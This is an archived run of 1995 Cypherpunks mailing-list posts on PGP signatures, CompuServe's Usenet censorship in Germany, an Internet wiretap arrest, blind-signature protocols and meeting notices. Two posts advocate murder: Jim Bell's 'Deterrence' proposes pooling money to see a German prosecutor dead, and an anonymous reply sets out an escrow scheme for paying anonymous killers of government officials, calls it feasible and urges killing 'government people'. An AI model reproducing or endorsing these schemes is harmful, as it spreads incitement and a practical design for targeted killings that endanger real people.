http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sat, 30 Dec 1995 07:23:03 +0800
To: "Dr. Dimitri Vulis" <dlv@bwalk.dm.com>
Subject: easy avoidance of PGP signature forgeries and reuse
In-Reply-To: <oTTsgD7w165w@bwalk.dm.com>
Message-ID: <Pine.BSD.3.91.951229172352.26978C-100000@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain




    START <attila>

	I never paid much attention to the problem other than to avoid 
    it by forcing it --i.e. list the destination and the send inside the
    signature block, thus:

    ----------------- BEGIN PGP SIGNED TEXT

    To: john doe <john@box.com>
    Newsgroups: sci.crypt
    From: jane roe <jane@topsey.turvey.com>
    Subject: that's all folks!

    John, don't darken my door during the Christmas holidays.

	Nevermore.

    jane

    ---------------- BEGIN PGP SIGNATURE

    ERTYUIKJBNM,./34567JM,./

    ---------------- END PGP SIGNATURE

	with e-mail, e-letters, direct faxes, etc. it is to easy to 
    ignore the courtesy header. From a standpoint of security, you have
    blown away each of the attacks outline in your article in so much as 
    the signature will not compute if the courtesy block is omitted.

	personally, I do not think PGP 3 should attempt to solve the 
    problem. Most of the headers involved are applied _after_ the message 
    leaves the mail program; and, PGP interfaces are virtually the same 
    as invoking an alternate editor, which gets you nothing.

    END <attila>


--
--------------------------------------------------------------------
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length$n&~1)/2)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 30 Dec 1995 12:02:58 +0800
To: dnowch2@teleport.com
Subject: "Deterrence"
Message-ID: <m0tVroR-00090UC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


In the 1960's movie, "Dr. Strangelove," the title character defined
"deterrence" as being "the art of making your enemies FEAR to attack you."  

As has been well-publicized recently, pressure from a German prosecutor had
induced Compuserve to cease access to a number of sex-related Internet
groups.  Clearly, neither Compuserve nor its users nor the Internet
community in general has demonstrated adequate DETERRENCE to him or people
in his position.

In my essay, "Assassination Politics," I pointed out that it would be
relatively easy to deter such official-type actions if enough of us simply
said, "NO!" and denominated it in terms of dollars and cents.  After all,
with four million Compuserve users, if they each were willing to donate a
penny to see this latter-day Fuhrer dead, that would be $40,000.  (Pardon me
if I don't translate this into marks and other currencies.)  

In practice, of course, if such a system were in place, it is  highly
unlikely that he would have even dared try to put pressure on Compuserve,
and Compuserve wouldn't have dared respond cooperatively to such outrageous
influence.

It is worth noting that if six million Jews had been willing to donate a
dime each in 1932 to see Hitler and his cronies dead, much of the late
thirties and forties would have ended up quite differently.  Some may argue
that today's situation isn't nearly as serious now as it was then, but then
again, the situation probably didn't really look very serious in 1932, did it?!?

WHEN, exactly, would it be appropriate to act?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HousePasley <byteback@ldd.net>
Date: Sat, 30 Dec 1995 10:18:48 +0800
To: cypherpunks@toad.com
Subject: (no subject)
Message-ID: <30E49366.18EB@ldd.net>
MIME-Version: 1.0
Content-Type: text/plain


Talk to me..my son has shoes...cypher this...
mays out of maggots, go arial.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Sun, 31 Dec 1995 02:44:02 +0800
To: <cypherpunks@toad.com
Subject: Re: CHU_chu   Search Engines, Branded Communities
Message-ID: <9512300206.AA12772@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


riverrun

John Young writes:
>    12-29-95. FinTimes:
 
>    "Engine of the superhighway" muses on search engines and 
>    branded communities, and how their convergence will 
>    barb-wire lecher Tio Web from wild-legger Tia Juana.
>    CHU_chu

    I can't get much out of the second clause above.

    Much as I truely value John's notices of articles from the paper
world, I sometimes wish he would not obfuscate his text.

speaking for myself

Peter Trei
trei@process.com

riverrun




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Sat, 30 Dec 1995 12:33:12 +0800
To: cypherpunks@toad.com
Subject: Internet wiretap?
Message-ID: <199512300409.UAA28915@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


This tidbit was posted a few hours ago on c|net (12/29 4:00 PST).

        Thanks to a wiretap on the Internet, three people have been arrested
for illegally 
        selling and manufacturing cellular phone equipment and electronic
devices over the Internet, 
        according to Secret Service agent Brian Gimlett. This is the first
time the Secret Service and the
        Drug Enforcement Administration were allowed to wiretap via the
Internet, says Gimlett. 

The rest of the story talks about an exchange of e-mail discussing the sale
of various nasty
cellular accessories.  There is no information on exactly what "wiretap"
means or any other
technical details.  Interesting to note the DEA was in on it.

Crypto-relevance only if the perps were using a remailer (which I kind of
doubt).

Full story (quite short), at:
http://www.cnet.com/Content/News/Files/0,16,326,00.html

Joel





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Sat, 30 Dec 1995 11:36:23 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Massey, CEO of Compuserve, on Internet
In-Reply-To: <ad099b2f180210046cfa@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.951229220043.25326A-100000@unix5.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 29 Dec 1995, Timothy C. May wrote:

> Wow! I am watching the CEO of Compuserve being interviewed on CNBC,
> explaining how his company is "taking the high road by complying with the
> laws of Germany" in removing access to 200 Usenet groups.

A blatant lie.

Newsgroups: alt.online-service.compuserve,comp.org.eff.talk
From: tomklem@netcom.com (Tom Klemesrud)
Subject: Re: Compuserve lies about the Germans
Message-ID: <tomklemDKDBnr.15F@netcom.com>
 
[ ... ] 
Compuserve CEO Massey appeared on CNBC and said that Compuserve was
only obeying the (German) law.  However, the AP article makes it clear 
that there is no such German law--that there is only an investigation 
going on in Germany as th exactly what is on the internet.  Compuserve 
was not asked to censor anything, according to the AP article.  
Compuserve has apparently used this episode as a excuse to do what it
was already predisposed to do, in my opinion.

[ end ]

From: tc <72417.1514@compuserve.com>
Newsgroups: alt.online-service.compuserve,comp.org.eff.talk
Subject: Re: Compuserve lies about the Germans
Message-ID: <4c222o$jc3@dub-news-svc-4.compuserve.com>
 
CompuServe is starting to look worse and worse in this thing.  I'm
still waiting for the real story.  Here is an excerpt from a story on the
AP:
 
       <stuff deleted>
   Munich prosecutor Manfred Wick confirmed Friday that Bavarian state
police investigators searched CompuServe's networks and computers last
month for child pornography, but he would not say what they found.
   "We didn't threaten them with charges," Wick said.
   Arno Edelmann, a CompuServe product manager in Unterhaching,
Germany, said Friday that the company blocked access to 200
sex-oriented newsgroups in a portion of the Internet called Usenet.
   "It is perhaps an overreaction but we want to cooperate with the
Bavarian prosecutor's office," Edelmann said.
       <stuff deleted>
[ end ]

And herein lie the pitfalls of trying to establish a global ISP
presence.

I'm with Tom Klemesrud on this one. CI$ is trying to lick some boots
to get a position as a _capo_ when Der Revolution begins.

Michael, rec.arts.erotica and soc.support.youth.gay-lesbian-bi
moderator (both banned by CI$). As far as I'm concerned, CI$ is
no longer welcome to any articles from my group; I'll mangle the Path:
header as necessary to insure they never get there.
--
Michael Handler <grendel@netaxs.com>      <URL:http://www.netaxs.com/~grendel>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 30 Dec 1995 14:58:38 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: DIBS
Message-ID: <Pine.SUN.3.91.951229222945.1222A-100000@crl13.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Eric Hughes and I are calling dibs for the FEBRUARY Cypherpunks
meeting.  On February 10, we will host the meeting at our offices
in downtown San Francisco (easily accessible by BART and Muni).
More details later.

After the meeting, I will be hosting a gala costume party in the
large, elegant Oakland house owned by two of my co-hosts.  I will 
soon be setting up an invitation on a web page provided another
co-host, C'punk hero-of-the-revolution, Sameer.  Stay tuned.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 31 Dec 1995 02:36:07 +0800
To: austin-cpunks@einstein.toad.com (Austin Cypherpunks)
Subject: January meeting
Message-ID: <199512300441.WAA01326@einstein>
MIME-Version: 1.0
Content-Type: text



Hi all,

Just a reminder that the next general meeting will be held on January 7,
1996 from 6-8pm at the Central Market HEB on N. Lamar at 42nd.

We will be discussing further issues related to the video and setting a
schedule of meetings and deadlines for various production points.

Hope to see you folks there!

                                             Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 30 Dec 1995 13:05:55 +0800
To: austin-cpunks@einstein.toad.com (Austin Cypherpunks)
Subject: January meeting (fwd)
Message-ID: <199512300442.WAA01350@einstein>
MIME-Version: 1.0
Content-Type: text



Hi all,

Please make the date Saturday January 6, not Sunday January 7.


Forwarded message:
> From ravage@ssz.com Fri Dec 29 22:41:13 1995
> From: Jim Choate <ravage@ssz.com>
> Message-Id: <199512300441.WAA01326@einstein>
> Subject: January meeting
> To: austin-cpunks@ssz.com (Austin Cypherpunks)
> Date: Fri, 29 Dec 1995 22:41:11 -0600 (CST)
> Cc: cypherpunks@toad.com
> X-Mailer: ELM [version 2.4 PL23]
> Content-Type: text
> Content-Length: 373       
> 
> 
> Hi all,
> 
> Just a reminder that the next general meeting will be held on January 7,
> 1996 from 6-8pm at the Central Market HEB on N. Lamar at 42nd.
> 
> We will be discussing further issues related to the video and setting a
> schedule of meetings and deadlines for various production points.
> 
> Hope to see you folks there!
> 
>                                              Jim Choate
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sat, 30 Dec 1995 12:59:44 +0800
To: cypherpunks@toad.com
Subject: http://www.gsa.gov/irms/ki/sipmo.htm
Message-ID: <9512300421.AA23481@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


As many of you probably already know, the US Postal Service is creating
a national public-key infrastructure for individuals (I've never heard
any mention of Corporate identities, not to say that there won't be any).

A few weeks ago the General Services Agency of the US Gov't had an open
working session of their Security Infrastructure Program Management Office
(SIPMO).  At that session they announced a pilot program for electronic
filing of federal tax returns, using the USPS infrastructure.

The URL in the subject line has not yet been updated to discuss the pilot;
right now it is basically an overview of SIPMO.

Anyone know more?
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daniel guerard <danielguerard@accent.net>
Date: Sat, 30 Dec 1995 13:21:51 +0800
To: cypherpunks@toad.com
Subject: (no subject)
Message-ID: <199512300455.XAA29856@server0.accent.net>
MIME-Version: 1.0
Content-Type: text/plain


please, mail list of server. Tank you






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Sat, 30 Dec 1995 14:28:32 +0800
To: tallpaul@pipeline.com (tallpaul)
Subject: Re: Zensoren ueber Alles
In-Reply-To: <199512300548.AAA02407@pipe8.nyc.pipeline.com>
Message-ID: <199512300604.AAA05518@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

This "Tall Paul" fellow said:

> Based on other news reports, I conclude that CompuServe lied in both areas.

So?  Companies lie all the time - the bigger the company, the bigger the 
lie, in my experience.  Companies are like governments - they will get 
away with what they can until caught.  Even then, they rarely stop - it 
just goes undercover.

> It did none of these things. It cut off all customers to an enormous number
> of groups. It inferrentially violated property rights (i.e. contracts) to
> customers promised internet access and now provided only a crippled version
> thereof. And it lied about the whole thing. 

Again, so?  All that it will do is to drive people away from Compu$erve 
into the arms of other service providers.  Maybe some of them will even 
figure out what a *real* ISP is...
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOTWTyS9AwzY9LDxAQH+OwQApSgooUc/ZgQgQm5xn1v4YxmI5jcVoJfR
b5pBCnJvcvTBld5C/6tTuOyqpnEvJD/oBlT+buhQDinvLYD97Z3oh65weEAZNrJ0
x2iTz1NzilPB5EDawIPs4lTELFaJLLdPVKZvgPaqhoUum3Sm3uHvgL1HcvnR+vt0
5hZW/NGlF4M=
=p6vI
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Sun, 31 Dec 1995 02:46:31 +0800
To: cypherpunks@toad.com
Subject: Zensoren ueber Alles
Message-ID: <199512300548.AAA02407@pipe8.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
>From initial reports, the challenge to CompuServe did not come from the
German government. It did not come form the German Parliament. It did not
come form the German judiciary. 
 
It came from one (repeat one) prosecutor in one (repeat one) city. I also
suspect the U.S. journalists who reported the news may not know the
difference between a "prosecutor" and a "procurator." It is a significant
differnce in many legal systems. (Not to slag U.S. journalists too hard
because I myself don't know which of the two Germany has.) 
 
The news reports on New York City television focused exclusively on the
"sexual" character of the banning, without directly mentioning that other
groups were also banned. 
 
"But," wrote Jonathan Oatis of Reuter in an article available on the
Clarinet news feed, "many more span a host of topics, including Barney the
dinosaur of children's television, Estonian politics and the New York
Yankees baseball team." 
 
Also included in the reports of news groups banned is the clari.news.sex
feed containing articles routinely filed by the Associated Press and
Reuter. It has also been reported that self-help recovery groups were
banned because the groups also had the word "sex" in the name. (In order to
save the victims it was necessary to destroy them!) 
 
How did the 11 o'clock news here in New York handle the story? 
 
Two of the three channels stated that CompuServe banned "chat rooms," not
news groups. The third got it right and reported on internet groups. The
two channels who spoke of the "chat room" ban also stated that the rooms
were banned because they contained "explicit" sexual images or graphics
"depicting" sexual topics. 
 
What can we infer? 
 
No single thing directly save for the inaccuracy of the reports. 
 
But certainly even national-level tv editors are not yet sufficiently
informed about the internet to know the difference between chat rooms and
news groups. I'd say that this level of ignorance rather impacts on their
ability to do their job in a professional fashion. (It also points to our
collective failure to adequately inform them.) 
 
Second, the editors -- whether under pressure of deadline, personal
psychological bias, or more sinister things -- can't pick up the idea that
the verbal ("chat") and the visual ("explicit" sexual images) are two
different things. 
 
Third, the sexual hysteria of the editors themselves significantly erodes
their ability to perform their jobs in an objective fashion. 
 
CompuServe also got off easy under initial press inquiry. 
 
One spokesman for the company announced they were required to do it. He
also stated that there was no way to cut the German customers off from the
groups will making the groups available to other CompuServe customers. 
 
Based on other news reports, I conclude that CompuServe lied in both areas.
(BTW, this is the first time I recall using the word "lie" on any post to
the cypherpunks list.) 
 
I also infer that CompuServe did not "roll over" on this issue. The
evidence shows, I think, that CompuServe is merely using one German
prosecutor (or procurator) as an excuse to implement their own desired and
previously prepared policy. 
 
CompuServe had, I think, several actions open. 
 
First, if the news reports that it was not "forced" to do anything by the
single German, it could simply not have done anything. 
 
Second, it could have appealed the decision by the prosecutor to the courts
(or submitted accurate information to the procurator and demanded that he
consider it.) 
 
Third, it could have narrowly targeted the banned groups to alt.binary
groups dealing with sexual issues. 
 
Fourth, it could have easily used software to cut off the feed to Germany. 
 
It did none of these things. It cut off all customers to an enormous number
of groups. It inferrentially violated property rights (i.e. contracts) to
customers promised internet access and now provided only a crippled version
thereof. And it lied about the whole thing. 
 
Interestingly, none of the classic cypher-nasties were behind CompuServe's
decision. The "big statists" in Washington didn't tell CompuServe to do it.
The "hell with private property rights" bureaucrats didn't force CompuServe
to do it. 
 
Nor did the taxman. The taxmen historically rarely do; they do not seek to
ban "sin;" they tax it. The Treasury Department's Bureau of Booze, Butts &
Bazookas (aka Bureau of Alcohol, Tobacco, and Firearms) is not behind this
country's anti-booze, anti-butt, or anti-bazooka movement. They just tax
all three. (They may kill you if you buy, transfer, or manufacture your
bazooka without paying the US$ 200 (?) excise tax, but they're not out
there in the forefront of those pushing gun control.) 
 
Additional facts that will be forthcoming in the future will point, I
believe, to two things behind CompuServe's decision. The two leading causes
will, I predict, be: 
 
First, the growing abstract systemic fear in this society produced by a
society in crisis. This is a fear unnaturally re-directed at things like
PGP and anonymity by various political poo-bahs to both deflect the
citizens' fears from real causes and to rechannel that fear into areas
where the same poo-bahs can claim credit for doing the "something" in
"something has to be done." 
 
Second, the growing sexual hysteria within large sections of the population
that does not exist in an abstract form and is not being artifically
rechanneled but rather appealled to. 
 
CompuServe, in a rather brilliant move, managed to handle both groups, and
blame a foreign force to boot. But while brilliant tactically, I do not
believe they will succeed in continuing their policy. 
 
     --tallpaul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sat, 30 Dec 1995 17:23:09 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: blind validation
In-Reply-To: <199512281849.MAA08259@proust.suba.com>
Message-ID: <199512300908.EAA07360@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Alex Strasheim writes:
[discussion and assumptions liberally elided]
> 1.   Alice initiates a transaction with Bob.  (Perhaps by asking
>      him for a file.)
> 
> 2.   Bob generates a random number and sends it back to Alice.
> 
> 3.   Alice blinds Bob's number and sends it to Trent, along with
>      proof of her validatability.
> 
> 4.   Trent checks Alice's proof, signs the blinded number, and
>      then returns it to Alice.
> 
> 5.   Alice unblinds Bob's number, then sends it to Bob.
> 
> 6.   Bob checks Trent's signature and makes sure that the number
>      he recieved matches the one he sent out.  Then Bob processes
>      Alice's transaction.
> 
> If Bob always follows this protocol, he can prove to Sam that
> he's followed the law.  Alice remains anonymous.  Alice can still
> transfer the file, but she has to give it away herself:  she
> can't give away the ability to get it directly from Bob without
> giving away the ability to prove Aliceness to Trent.  

I'm not convinced that your last point is true. It appears that the signed
Bobnet-access-number is still just a transferrable ticket. Charlie can
place an order with Bob, forward the Bobnet-access-number to Alice, wait for
Alice & Trent to do the blinding & signing tango, forward the signed Bobnet-
access-number to Bob, and get the goods from Bob.
  
Charlie can't use the signed Bobnet-access-number to prove to Trent
that he's Alice. In fact, since it's unblinded, Charlie can't even prove
that he's linked to a particular validation performed by Trent. (If Alice
foolishly gave him the blinded version too, he could show that he shares
Alice's knowledge about this validation.) 

[...]
> The main problems that I can see with this protocol are:
> 
> 1.   It's vulernable to traffic analysis.
> 2.   Sam has to trust Trent, which he may be unwilling to do.
> 3.   You can infer stuff about Alice from the kinds of requests
>      she makes of Trent.  Someone who always asks Trent for proof
>      that he's not a felon might tag himself as a person who buys
>      a lot of guns or ammunition, for example.

3. is OK as long as Alice trusts Trent. The trick is selecting a Trent
trusted by both Alice and Sam ;)

-Futplex	<futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 31 Dec 1995 06:49:55 +0800
To: cypherpunks@toad.com
Subject: 1OV_ert  Net Tap 1
Message-ID: <199512301147.GAA20962@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-30-95. NYP:

   Aided by the first court-approved Net wiretap, via
   Compuservile, three people have been jailed for an
   international plot to sell cel-tel cheaters.

   1OV_ert












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Sat, 30 Dec 1995 23:51:51 +0800
To: <cypherpunks@toad.com>
Subject: last straw
Message-ID: <v0300420cad0afe0c22d7@[129.46.82.92]>
MIME-Version: 1.0
Content-Type: text/plain


I've decided to cancel my CrampuNerve account and send the weasels a msg to
telling them why. I encourage everyone here to do the same with your CI$
account (if you still have one). These [insert colorful expletive here]s
only understand one thing: cold ca$h. Thus, the only effective way to send
them an indication of one's displeasure at their poor precedent-setting is
to vote with one's wallet.

Any who are still unfortunate enough to rely on CI$ for Internet/Usenet
access are getting reamed price-wise anyway, not to mention suffering poor
reliability and now access, so maybe a few of them could also take this
opportunity to migrate to an ISP with some real "backbone."

CI$ is becoming redundant and now they're making themselves unappealing.
Convenient, economical dialups are now available to Europeans and any of us
Yanks who have to travel to Europe regularly through various
non-anus-kissing ISPs (xs4all, iSYS, etc.). Back in '90-'92 CI$ used to be
somewhat handy when travelling to Europe, but even then it was horribly
expensive when you tallied up their "surcharges" for dialing in through
Frankfurt, etc.

Good riddance, say I.

   dave

____________________________________________________________
"I prefer a real whorehouse to The Theatre." -Dorothy Parker






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@alpha.c2.org (Anonymous)
Date: Sun, 31 Dec 1995 01:17:07 +0800
To: cypherpunks@toad.com
Subject: NoneMurder, Inc. (was "Deterrence")
Message-ID: <199512301603.IAA25153@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> In my essay, "Assassination Politics," I pointed out that it would be
> relatively easy to deter such official-type actions if enough of us simply
> said, "NO!" and denominated it in terms of dollars and cents.  After all,
> with four million Compuserve users, if they each were willing to donate a
> penny to see this latter-day Fuhrer dead, that would be $40,000.  (Pardon
> me if I don't translate this into marks and other currencies.)
> 
> In practice, of course, if such a system were in place, it is  highly
> unlikely that he would have even dared try to put pressure on Compuserve,
> and Compuserve wouldn't have dared respond cooperatively to such
> outrageous influence.

In reality, four million compuserve users would not donate a penny each.
It is likely that a few hundred people who felt strongly about
the cause (and didn't mind a little bloodshed) might be willing to put up
funds in amounts of around $20.  

Of course nobody would want to advertise under their real name that they
have a contract out on some gummint agent.  This would require the
existance of a "Murder, Inc." as an escrow agent for the money.  (There
would likely be several such agents as it it unlikely people would trust
just one.)  Each person would give the escrow agent their contribution
toward the elimination of the gummint troublemaker.

Anyone who was willing to do the hit could post an encrypted claim, in
advance, stating the time and date or method he plans to use, and where to
send payment.  Once the act was done, the hitman posts the decryption key
so that everyone can see that he did it, and he collects the money.

If after some reasonable amount of time, nobody takes out the gubmint
asswipe, then the escrow agent returns all the money.

It's quite feasable, and not especially difficult.  The hardest thing is
convincing people that the escrow agent is trustworthy, and to convince
people that they really want to pay to have someone murdered.  There is
something a little chilling about that thought...  On the other hand, the
US government seems to feel that it's okay to kill people if they can get
away with it (Ruby Ridge, Waco, that guy in California (forgot his name)
who got shot on his ranch over bogus drug charges, etc.)  So although
murder is a Bad Thing(tm), the gubmint has set a very bad precedent in
making it look "okay".  Hence it becomes "okay" for people to do the same
to them (for example the recent Oklahoma incident).  It's okay for the
government to randomly pick on innocent people to make a statement, hence
it becomes okay to derail random trains to make a statement.  (For the
record, I am absolutely not defending what those people did to that Amtrak
train in Arizona, just pointing out the psycology of it.  If you're mad at
the government then fucking kill some government people - What the hell
did the amtrak passengers do to you?)  Unfortunately it seems to be becoming
okay to pick on random people to make an unrelated point (or just boost your
ego)  The government is using this tactic too, for example pick on a few
porno collectors to demonstrate your "authority" in cyberspace.  Same thing
with picking on random gun owners to make a statement against RKBA.  So
maybe it will become popular to kill a random politician (or anyone) just
to make a statement against the government.  This is turning into a rant.
I'll shut up now.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Sat, 30 Dec 1995 21:28:20 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Massey, CEO of Compuserve, on Internet
Message-ID: <m0tW16P-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Michael Handler writes:

: On Fri, 29 Dec 1995, Timothy C. May wrote:
: 
: > Wow! I am watching the CEO of Compuserve being interviewed on CNBC,
: > explaining how his company is "taking the high road by complying with the
: > laws of Germany" in removing access to 200 Usenet groups.
: 
: A blatant lie.

[Material deleted]

: CompuServe is starting to look worse and worse in this thing.  I'm
: still waiting for the real story.  Here is an excerpt from a story on the
: AP:
:  
:        <stuff deleted>
:    Munich prosecutor Manfred Wick confirmed Friday that Bavarian state
: police investigators searched CompuServe's networks and computers last
: month for child pornography, but he would not say what they found.
:    "We didn't threaten them with charges," Wick said.
:    Arno Edelmann, a CompuServe product manager in Unterhaching,
: Germany, said Friday that the company blocked access to 200
: sex-oriented newsgroups in a portion of the Internet called Usenet.
:    "It is perhaps an overreaction but we want to cooperate with the
: Bavarian prosecutor's office," Edelmann said.
:        <stuff deleted>
: [ end ]
: 
: And herein lie the pitfalls of trying to establish a global ISP
: presence.
: 

One should also notice that Bavaria is only one state in the German
Federal Republic; this case is more like Texas investigating
Compuserve than the United States federal government investigating
Compuserve.  Bavaria is the stronghold of what can properly be called
the (Catholic) Religious Right in Germany.  It should also be noticed
that in general German publications and television seem to be less
constrained in publishing materials that in the United States would be
called ``indecent'' by some than are United States publications and 
broadcasters.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <nobody@c2.org>
Date: Sun, 31 Dec 1995 02:22:47 +0800
To: cypherpunks@toad.com
Subject: Is Dr Fred Cohen a Loon???
Message-ID: <199512301723.JAA00902@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Trolling for Flames(just another anonymous poster destroying the 'net)
:)

The Subject says it all... I believe Fred suffers from a severely inflated
ego and suffers from the "false expert" syndrome detailed by various
self-help orgs... what say you fred??


     Another anon poster destroying the integrity of the net






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 31 Dec 1995 02:56:08 +0800
To: jk@digit.ee
Subject: Re: (fwd) DigiCash licencing?
Message-ID: <199512301815.KAA14002@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


Jyri Kaljundi <jk@digit.ee> wrote:
> Does anyone know about the terms and costs of licencing ecash software? I
> have tried contacting DigiCash directly with these questions, but have
> got no answers 

This experience (total lack of coherent response from Digicash) seems
to be widespread, on many issues.

The answer to your question has to be decided by DigiCash on a
case by case basis, and they are not noted for thinking on their
feet.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 31 Dec 1995 02:53:39 +0800
To: tallpaul@pipeline.com (tallpaul)
Subject: Re: Zensoren ueber Alles
Message-ID: <v02120d09ad0b2e12beef@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:54 12/30/95, tallpaul wrote:
[On the CI$ issue]

>I predict it will also be used for additional attacks on issues of
>encryption, privacy,  and anonymity. That is, I think we will see
>statements like "We need to be especially vigilant to make sure that the
>perverts are not smuggling banned material into the country via the
>internet. This means we have to block encryption, monitor user accounts
>even more carefully for potential perverts, etc. etc.

Nothing new here. Pornography and the other Three Horsemen will be use to
ban the spread of 'dangerous' thoughts on the Internet. This was clear
years ago. Let me emphasize a few facts:

o Non-GAK Encryption will be outlawed.
o 'Immoral' texts and pictures will be banned.
o The dissemination of 'dangerous ideas' will become a felony.

At best, Cypherpunks can hope to provide the infrastructure that will allow
an underground to communicate semi-securely. We are unable to stop the
global tidal wave of fascism. Let's not waste our time on bemoaning the
freedoms crushed in its path. We have more important work to do.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 31 Dec 1995 00:46:03 +0800
To: cypherpunks@toad.com
Subject: Re: another anonymous poster helping to destroy our rights
In-Reply-To: <01HZDR1AL5S48Y55Y6@mbcl.rutgers.edu>
Message-ID: <94HXgD17w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu> writes:
> From:	IN%"vznuri@netcom.com"  "Vladimir Z. Nuri" 28-DEC-1995 01:36:46.58
>
> >= the list charter can ask for people to submit to various practices on
> the honor system, such as not using pseudonyms. cryptoanarchists who
> hate the idea of trust are of course going to object to the honor system,
> because "that which cannot be enforced should not be prohibited".
> ----------------
> 	Does this last idea leave much doubt in anyone's mind that "Vladimir Z.
> Nuri" is a Detweiler tentacle?

Yes. I've exchanged several e-mails with LD.  LD is much smarter.
(Unless he's playing dumb... :)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
